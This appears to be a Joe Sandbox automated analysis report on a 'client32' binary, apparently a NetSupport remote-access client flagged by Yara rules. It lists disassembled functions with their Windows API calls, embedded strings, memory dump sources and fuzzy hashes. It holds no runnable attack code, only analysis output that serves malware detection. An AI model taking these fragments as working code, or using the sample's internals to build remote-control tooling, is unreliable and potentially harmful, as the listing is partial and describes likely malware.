                                                                                                                                        • Opcode Fuzzy Hash: 23d029142cee983248ae457151ce8ef0a09c94870d5e30484585e425a6cc80cf
                                                                                                                                        • Instruction Fuzzy Hash: 3B112575600625AFC710DB9CEC16D2AB3A99FD924DB808029E5AD97300E771EC1147C2
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6890FFD8
                                                                                                                                          • Part of subcall function 6890DAC0: SetEvent.KERNEL32(00000000), ref: 6890DAE4
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 6891000C
                                                                                                                                          • Part of subcall function 6890FBC0: EnterCriticalSection.KERNEL32(?,?,76933550,6891001D), ref: 6890FBC8
                                                                                                                                          • Part of subcall function 6890FBC0: LeaveCriticalSection.KERNEL32(?), ref: 6890FBD5
                                                                                                                                        • PostMessageA.USER32(?,00000501,00000000,00000000), ref: 68910034
                                                                                                                                        • PostThreadMessageA.USER32(?,00000501,00000000,00000000), ref: 6891003B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalMessagePostSectionThread$CurrentEnterEventLeaveObjectSingleWait
                                                                                                                                        • String ID: Queue
                                                                                                                                        • API String ID: 620033763-3191623783
                                                                                                                                        • Opcode ID: dce199f1283492021509c2c725a4eac080a649dd751f3ab2aadbc276064ddbaa
                                                                                                                                        • Instruction ID: 3b7385d820e5bfb24ff613d16058f02ad625125bcedf5b143de5f9b7a616d214
                                                                                                                                        • Opcode Fuzzy Hash: dce199f1283492021509c2c725a4eac080a649dd751f3ab2aadbc276064ddbaa
                                                                                                                                        • Instruction Fuzzy Hash: AD11E53564CB14DFDB31DBA8C850B2F33A8AB5675CF804029E85A97380CB71EC10CB95
                                                                                                                                        APIs
                                                                                                                                        • InterlockedIncrement.KERNEL32(6893CF70), ref: 6890928A
                                                                                                                                          • Part of subcall function 688F2420: _strrchr.LIBCMT ref: 688F242E
                                                                                                                                        • wsprintfA.USER32 ref: 689092B6
                                                                                                                                        • CreateEventA.KERNEL32(?,?,?,?), ref: 689092D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateEventIncrementInterlocked_strrchrwsprintf
                                                                                                                                        • String ID: %s_L%d_%x$0/#v
                                                                                                                                        • API String ID: 3335914318-2739044988
                                                                                                                                        • Opcode ID: ec4fb9eaf3b02cd0b39ef1e9822af4c5d20018f0202a0ea5923b3f5d7a0f9afe
                                                                                                                                        • Instruction ID: f5658143393fe34678cc037163d50c670bb579f5a36527510f8e02d4033628b7
                                                                                                                                        • Opcode Fuzzy Hash: ec4fb9eaf3b02cd0b39ef1e9822af4c5d20018f0202a0ea5923b3f5d7a0f9afe
                                                                                                                                        • Instruction Fuzzy Hash: 30115E75A04218AFCB20DF58CC45DEAB7BCEF89314F404199E95593200D770EA44CFA0
                                                                                                                                        APIs
                                                                                                                                        • LoadStringA.USER32(00000000,?,00000058,A0A8B03E), ref: 11141118
                                                                                                                                        • wsprintfA.USER32 ref: 1114112E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadStringwsprintf
                                                                                                                                        • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                        • API String ID: 104907563-3240211118
                                                                                                                                        • Opcode ID: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                        • Instruction ID: e2aba8975d0064ad862be08188f807418d6f8eeb8e9cddff9dd8f2c53222b253
                                                                                                                                        • Opcode Fuzzy Hash: ed963a6da0cc994b675a1a3ecec53232d14ad4da25c19b95f1ebe75632444126
                                                                                                                                        • Instruction Fuzzy Hash: 40F0F67AB011297BDB018BA99C84DDFB76CEF85A98B144021FA0893200EA31BA01C3A5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ACF
                                                                                                                                          • Part of subcall function 11087AB0: IsWindow.USER32(?), ref: 11087ADD
                                                                                                                                        • GetParent.USER32(00000000), ref: 1106719C
                                                                                                                                        • GetParent.USER32(00000000), ref: 110671A5
                                                                                                                                        • IsChild.USER32(00000000,00000000), ref: 110671B9
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                          • Part of subcall function 11087A50: IsWindow.USER32(110055D2), ref: 11087A6C
                                                                                                                                          • Part of subcall function 11087A50: IsWindow.USER32(?), ref: 11087A86
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Parent$Child__wcstoi64
                                                                                                                                        • String ID: FixEHParent$_debug
                                                                                                                                        • API String ID: 320216221-498807111
                                                                                                                                        • Opcode ID: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                        • Instruction ID: 19ed4bc464ac013ef3aede55ea0528bdf8a938b54301afc5030378f5434f72ea
                                                                                                                                        • Opcode Fuzzy Hash: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                        • Instruction Fuzzy Hash: 33F09636E01925679F01A6AD4C84DAFFADE9DC555830140E7FE25EB100ED609E01C7A1
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                        • _memset.LIBCMT ref: 688F561A
                                                                                                                                        • WSAStartup.WSOCK32(00000101,6893B91A), ref: 688F5635
                                                                                                                                          • Part of subcall function 688F5290: CloseHandle.KERNEL32(00000000,688F5678), ref: 688F529A
                                                                                                                                        • WSACleanup.WSOCK32 ref: 688F566E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strrchr$CleanupCloseFileHandleModuleNameStartup_memsetwsprintf
                                                                                                                                        • String ID: HTCTL32$WinSock 2.0
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • wsprintfA.USER32 ref: 6890DC04
                                                                                                                                        • _memset.LIBCMT ref: 6890DC27
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc_memsetwsprintf
                                                                                                                                        • String ID: Can't alloc %u bytes$Refcount.cpp
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$CopyFile
                                                                                                                                        • String ID: %spacket%03d.trc$%spacket%03d.trc.cap
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?), ref: 688F9188
                                                                                                                                        • GetUserNameA.ADVAPI32(68906AD7,?), ref: 688F91CD
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUserVersion
                                                                                                                                        • String ID: *CurrentUserName$@$client
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890ABDA
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        APIs
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • __strdup.LIBCMT ref: 6890AC64
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 6890ACA1
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6890ACB7
                                                                                                                                        • _malloc.LIBCMT ref: 6890ACC6
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6890ACE0
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                                                        • String ID:
                                                                                                                                        APIs
                                                                                                                                        • GetFileType.KERNEL32(?,?,?,68937820,0000000C), ref: 689252B7
                                                                                                                                        • GetLastError.KERNEL32(?,?,68937820,0000000C), ref: 689252C1
                                                                                                                                        • __dosmaperr.LIBCMT ref: 689252C8
                                                                                                                                        • __alloc_osfhnd.LIBCMT ref: 689252E9
                                                                                                                                        • __set_osfhnd.LIBCMT ref: 68925313
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43408053-0
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 68914A05
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _free.LIBCMT ref: 68914A18
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                                        • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                                        • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3044651595-0
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 68916D0A
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 68916D21
                                                                                                                                        • __amsg_exit.LIBCMT ref: 68916D2F
                                                                                                                                        • __lock.LIBCMT ref: 68916D3F
                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 68916D53
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F8D00: GetModuleFileNameA.KERNEL32(00000000,?,00000104,689067B5), ref: 688F8D6B
                                                                                                                                          • Part of subcall function 688F8D00: GetCurrentProcessId.KERNEL32 ref: 688F8DCB
                                                                                                                                          • Part of subcall function 688F8D00: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 688F8DD8
                                                                                                                                        • _memset.LIBCMT ref: 689067C9
                                                                                                                                        • _strncpy.LIBCMT ref: 689067DB
                                                                                                                                          • Part of subcall function 688FD140: _memset.LIBCMT ref: 688FD1BA
                                                                                                                                          • Part of subcall function 688FD140: WaitForSingleObject.KERNEL32(00000300,000000FF,00000001,00000000), ref: 688FD1E1
                                                                                                                                          • Part of subcall function 688FD140: EnterCriticalSection.KERNEL32(6893B898), ref: 688FD212
                                                                                                                                          • Part of subcall function 688FD140: LeaveCriticalSection.KERNEL32(6893B898), ref: 688FD223
                                                                                                                                        Strings
                                                                                                                                        • ctl_call - Cound not get gateway index from name, xrefs: 6890685B
                                                                                                                                        • CallByName, xrefs: 68906808
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalProcessSection_memset$CurrentEnterFileLeaveModuleNameObjectOpenSingleWait_strncpy
                                                                                                                                        • String ID: CallByName$ctl_call - Cound not get gateway index from name
                                                                                                                                        • API String ID: 2957942747-1711757507
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • std::exception::exception.LIBCMT ref: 68900D9C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68900DB1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: DATA$NAME
                                                                                                                                        • API String ID: 1338273076-4000142801
                                                                                                                                        • Opcode ID: db91d4318c7874b5e917ba1ccdf078936da98b8979a190488d350a8b53801ead
                                                                                                                                        • Instruction ID: e5d4e3de761a499cfcf0458ac09683b22c8ca33018296552d2fd52aacaff2898
                                                                                                                                        • Opcode Fuzzy Hash: db91d4318c7874b5e917ba1ccdf078936da98b8979a190488d350a8b53801ead
                                                                                                                                        • Instruction Fuzzy Hash: A841FBB5C0425DAFDF10DFE9D8809EEBBB8FB58214F90452EE426A7240E7349A05CF91
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 6890619F
                                                                                                                                          • Part of subcall function 689033A0: wsprintfA.USER32 ref: 689034FD
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                          • Part of subcall function 68907B60: _sprintf.LIBCMT ref: 68907B77
                                                                                                                                          • Part of subcall function 689077E0: _free.LIBCMT ref: 689077EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __vswprintf_free_memset_sprintfwsprintf
                                                                                                                                        • String ID: CMD=CONTROL_SEND_PIN$PIN=%s$PINserver
                                                                                                                                        • API String ID: 2968883096-3759296614
                                                                                                                                        • Opcode ID: a7c7aaf5800cce2687253dfba2da5d1a5662c096839b88411b0ff7a01efb53a6
                                                                                                                                        • Instruction ID: 509958bcb72e9b906cf60c8f7e44f78e56b67c0c4fee103601963b0cab9d22d3
                                                                                                                                        • Opcode Fuzzy Hash: a7c7aaf5800cce2687253dfba2da5d1a5662c096839b88411b0ff7a01efb53a6
                                                                                                                                        • Instruction Fuzzy Hash: D7315875D10228AADB20DB78DC41FEE77B8AB89214F5086D9E50DE7181DF319A85CF60
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                                        • Opcode ID: 9d47eb442f11df653a0b13a46717c574d5f32f343789f6575f3d678680e18a56
                                                                                                                                        • Instruction ID: 40ef6235404972733b229111f8bbbca22878fde559c7484a979dd1f4d39e39f8
                                                                                                                                        • Opcode Fuzzy Hash: 9d47eb442f11df653a0b13a46717c574d5f32f343789f6575f3d678680e18a56
                                                                                                                                        • Instruction Fuzzy Hash: C73157769041A99FCB20EF68CCC0A98B7F4FF49384B5049B9E688DB201C271ADC6CF10
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: IsA()$NSMString.cpp$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                                                                        • API String ID: 4104443479-152930664
                                                                                                                                        • Opcode ID: 333b2a24185dd4a248711e0823da29cd379dc263914fcaeec30c7da2e0af3f98
                                                                                                                                        • Instruction ID: 8df893ec3134b87433acea7e71d67a4ee692f17654bf6ac90a6757447e571f93
                                                                                                                                        • Opcode Fuzzy Hash: 333b2a24185dd4a248711e0823da29cd379dc263914fcaeec30c7da2e0af3f98
                                                                                                                                        • Instruction Fuzzy Hash: 03212636A446166FC3208B5CDC94E6BB3A99FD934CF50442DF9999B201DB31E80982E5
                                                                                                                                        APIs
                                                                                                                                        • #16.WSOCK32(?,?,?,00000000), ref: 689079F1
                                                                                                                                        • WSAGetLastError.WSOCK32(?,?,?,00000000), ref: 68907A16
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: hbuf->data$httputil.c
                                                                                                                                        • API String ID: 1452528299-2732665889
                                                                                                                                        • Opcode ID: 554ac6ba0374d18b8f65c29dd003b627179795ac3222cbaa903b706b84883db2
                                                                                                                                        • Instruction ID: d5661df3e0a3131e3f62600e35a374b71cecdaa763ceaa3f61fccffe385a6745
                                                                                                                                        • Opcode Fuzzy Hash: 554ac6ba0374d18b8f65c29dd003b627179795ac3222cbaa903b706b84883db2
                                                                                                                                        • Instruction Fuzzy Hash: 12215E7A604B05AFD320CE6DD840A27B7F9EF95768B55C82DD8EA87601D732F8018B90
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 689075D8
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: VUUU$buf$e:\nsmsrc\nsm\1210\1210f\ctl32\uuencode.c
                                                                                                                                        • API String ID: 501242067-1152951737
                                                                                                                                        • Opcode ID: 25bca52c15d771c8179490ad605ec25eb8d7b8406ea1bca67677efcefa5da116
                                                                                                                                        • Instruction ID: c5f2a36aad180089747702d4ac6979c6f22bbfcebbb6619f93b662f6dcb4a531
                                                                                                                                        • Opcode Fuzzy Hash: 25bca52c15d771c8179490ad605ec25eb8d7b8406ea1bca67677efcefa5da116
                                                                                                                                        • Instruction Fuzzy Hash: 4B2198325085866BC3018F2D8C502D5BBFA9FCA228B5CC069F8D99F342E973E906C7D1
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 689114D9
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: c != '\0'$dstbuf$yenc.c
                                                                                                                                        • API String ID: 501242067-509959809
                                                                                                                                        • Opcode ID: 81c97809a37fc9361389307178e1698a5be50f79c7aa2aae380570b9e2229c41
                                                                                                                                        • Instruction ID: 211544875c2aa442fa31949dfaec98eed6cfa8787526a1692f3a136ffc5607f8
                                                                                                                                        • Opcode Fuzzy Hash: 81c97809a37fc9361389307178e1698a5be50f79c7aa2aae380570b9e2229c41
                                                                                                                                        • Instruction Fuzzy Hash: 8F210A75B89218AFC701DF28A84069DB7B4EFD2368F544165ECE597380E631CA06D791
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(A0A8B03E,00000000,?,A0A8B03E,1118736B,000000FF,?,11066188,NSMWClass,A0A8B03E,?,1106DC18), ref: 110311AA
                                                                                                                                        • __strdup.LIBCMT ref: 110311F5
                                                                                                                                          • Part of subcall function 110310B0: LoadLibraryA.KERNEL32(Kernel32.dll,A0A8B03E,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 110310E2
                                                                                                                                          • Part of subcall function 110310B0: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031120
                                                                                                                                          • Part of subcall function 110310B0: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 1103112E
                                                                                                                                          • Part of subcall function 110310B0: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,11186B98,000000FF,?,110311BB), ref: 11031154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                                        • String ID: NSMWClass$NSMWClassVista
                                                                                                                                        • API String ID: 319803333-889775840
                                                                                                                                        • Opcode ID: 46a647a9c5bb73cbf9c610ab71be3ff3dfedca409816ccc490a05da233c0cef1
                                                                                                                                        • Instruction ID: da22cb9b74e46dcd904e816c1cfbcb9dca7c1c5d087ee23a6b3981c0c6242146
                                                                                                                                        • Opcode Fuzzy Hash: 46a647a9c5bb73cbf9c610ab71be3ff3dfedca409816ccc490a05da233c0cef1
                                                                                                                                        • Instruction Fuzzy Hash: 2721D272E286855FD701CF688C407EAFBFAAB8A625F4086A9EC55C7780E736D805C750
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 688F6D0A
                                                                                                                                        • GetProcAddress.KERNEL32(?,InternetReadFile), ref: 688F6D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: InternetQueryDataAvailable$InternetReadFile
                                                                                                                                        • API String ID: 190572456-1434219782
                                                                                                                                        • Opcode ID: f61f7d0d41705b2bddadd8ae6b2dcdd88e7011fcc8a5ddb51cb97dbc3cac1dc2
